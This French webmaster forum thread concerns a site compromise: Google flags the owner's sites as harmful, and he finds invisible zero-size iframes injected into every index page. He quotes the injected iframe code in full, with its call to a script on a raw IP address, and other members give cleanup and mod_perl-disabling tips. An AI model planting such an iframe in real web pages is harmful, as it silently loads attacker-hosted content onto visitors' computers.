Le meme problème que WRI avec Google

• Auteur de la discussion Auteur de la discussion franceradio
  • Date de début Date de début
F
franceradio
Guest
Bonjour,

J'ai réçu plusieurs email de la part de google m'informent que mes sites contiennent un contenu peut endommager les ordinateur, et en cherchant ces sites sur google on tombe sur le meme message qu'il etait sur l'annuaire de WRI:

"This site may harm your computer"

J'etais étonné par tout sa, j'ai verifié les codes de mes sites, et la surprise, j'ai trouver qu'il y a une iframe dans chaque index.php ou index.html comme ceci :

Code:
<iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe><!-- 1208615770 --><iframe src="http://124.217.252.62/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Voilà donc c'est sa qui gène google.

Je me suis documenter sur ce problème, il m'ont dit que c'est une faille en perl, donc mes questions:

- Comment peut on désactiver perl avec Linux ??

- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?

Merci pour votre aide.

WRInaute impliqué
alors ca est un virus (trojan)

si tu supprimer il revient alors pour supprimer ce virus :

couper tous les page de votre site de ftp vers votre poste puis tu supprimer le code de virus
recopie encore votre site en ftp et dans page index.html ( ou php ) tu doit desactive les droit d'ecriture - est les droits d'exectution
( button droit de la souris sur le fichier puis decoche ecriture et execution)

F
franceradio
Guest
merci pour votre réponse, sa c'est déjà fait, je voulais savoir :

- Comment peut on désactiver perl avec Linux ??

- Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?

WRInaute impliqué
pour la deuxiem question google detectee automatiqument si il y a un virus ou non mais sa apres la visite de votre site

F
franceradio
Guest
merci,

Problème résolu, j'ai trouvé la solution dans un forum en englais, c'est à travers l'outil webmaster de google.

Membre Honoré
franceradio a dit:
mahdivitche a dit:
tu peut me donne le solution détaille ???? et merci
La personne a déjà répondu à la question :
franceradio a dit:
Problème résolu, [...] c'est à travers l'outil webmaster de google.
Pas trouvé pour désactiver Perl sous Linux. :oops:

WRInaute discret
Ton probleme n'est pas résolu car la faille par laquelle le script s'est introduit dans ton hébergement existe toujours.

Membre Honoré
F
franceradio
Guest
11293928ad6.gif

WRInaute accro
Bien que tu sois content ou pressé t'es pas obligé de mettre 10 fois la même lettre ou 10 points d'intérrogation, c'est désagréable et ça ne donne pas franchement envie de t'aider ;)

WRInaute impliqué
L.Jee a dit:
Bien que tu sois content ou pressé t'es pas obligé de mettre 10 fois la même lettre ou 10 points d'intérrogation, c'est désagréable et ça ne donne pas franchement envie de t'aider ;)
hiihiihihi :lol: !!!!!!!!!!!!!!!!!!!!

WRInaute occasionnel
Que va-t-il arriver aux sites qui ont cet avertissement mais que n'effacent pas ce script?

Ils vont être petit à petit désindexés de l'index Google ?

WRInaute passionné
dans ton conf d'apache commente la ligne
LoadModule perl_module modules/mod_perl.so

tu peux aussi telecharger a2dismod
-http://pwet.fr/man/linux/administration_systeme/a2dismod

WRInaute discret
franceradio a dit:
Comment informer google que le contenu est désormais "propre" (après la suppression de ces lignes) ?

pour avoir déja eu le cas, google donne un lien direct pour informer de la mise à jour dans le mail qui vous annonce le soucis

➡️ Offre MyRankingMetrics ⬅️

pré-audit SEO gratuit avec RM Tech (+ avis d'expert)
coaching offert aux clients (avec Olivier Duffez ou Fabien Faceries)

Voir les détails ici

coaching SEO
Discussions similaires